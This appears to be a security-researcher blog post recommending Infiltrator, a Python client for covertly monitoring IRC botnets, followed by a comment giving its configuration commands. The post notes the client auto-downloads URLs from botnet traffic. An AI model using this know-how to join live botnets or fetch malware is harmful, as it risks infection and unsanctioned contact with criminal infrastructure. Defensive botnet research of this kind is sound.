Infiltrator Botnet Monitor
Usually the first question asked by someone who is interested in botnet monitoring is, "What do you use to monitor botnets?"
New hunters tend to watch IRC networks, then move up to HTTP, P2P, etc. Many new hunters try to use off the shelf IRC clients, until they realize the bloat really isn't worth it, and monitoring more than a dozen nets is incredibly impossible. Furthermore, monitoring custom IRCd's with an RFC compliant client will likely raise the suspicions of the botherder.
A friend (Magictao) found a newer client called Infiltrator and passed it my direction. Infiltrator is a python script written by zeroq. It should run on both Windows and *nix, and will allow you to monitor several botnets at once with very little bloat. We use something similar here at DISOG.
Paul has not had a chance to review the code yet and my python is very weak but I could not see anything too dangerous. Just remember this client will download urls seen in the IRC traffic. Please do what you can to protect yourself from accidental discharge of any downloaded malware. I ran the client for an hour or so this evening, and it did everything as advertised. Its missing documentation, but if you have a few minutes - give it a shot!
New hunters tend to watch IRC networks, then move up to HTTP, P2P, etc. Many new hunters try to use off the shelf IRC clients, until they realize the bloat really isn't worth it, and monitoring more than a dozen nets is incredibly impossible. Furthermore, monitoring custom IRCd's with an RFC compliant client will likely raise the suspicions of the botherder.
A friend (Magictao) found a newer client called Infiltrator and passed it my direction. Infiltrator is a python script written by zeroq. It should run on both Windows and *nix, and will allow you to monitor several botnets at once with very little bloat. We use something similar here at DISOG.
Paul has not had a chance to review the code yet and my python is very weak but I could not see anything too dangerous. Just remember this client will download urls seen in the IRC traffic. Please do what you can to protect yourself from accidental discharge of any downloaded malware. I ran the client for an hour or so this evening, and it did everything as advertised. Its missing documentation, but if you have a few minutes - give it a shot!
Labels: Botnet monitoring, Infiltrator, Python
posted by Nicholas at
02:41
1 Comments:
I found this on "Virus Blog"...It may help some of you:
----SNIP----
For those of you playing around with the infiltrator script. Here is some short documentation about how to get started:
* use the "set server" command to set the IP address of the command and control server (e.g. "123.456.789.0")
* use the "set port" command to set the IRC Server port (e.g. "80")
* use the "set nickname" command to set the bot nickname (e.g. "DEU|123456789")
* use the "set usermode" command to set the user mode (e.g. "a a a a:DEU|123456789"). If you do not set the usermode, infiltrator will automatically set it to "worm worm worm worm:[Nickname]".
* use the "set channel" command to set the botnet channel + channel password (e.g. "#botnet password")
* in some cases you need a server password as well, and that's were the command "set password" comes into play.
Now you are done setting up the configuration. Next to do is "start thread" and infiltrator will join and monitor the botnet. To save the current configuration use the command "save configuration".
Stored configuration can be loaded anytime with "load configuration [configName]". To list all stored files use "show stored".
To stop a monitoring thread use the command "stop thread [threadName]". To list the currently running threads use "show threads". To view the last 20 lines of a running thread use "get last [threadName]". The complete log of the thread can be found in the logs directory.
There are some other little features to test, like the talkback feature. If it is enable a thread monitoring a channel, will start to send messages to the channel, if it sees a certain number of messages of one kind appearing. Just play around with it =)
Next version of infiltrator to be released, shipps with HTTP bot support.
----END----
Post a Comment
<< Home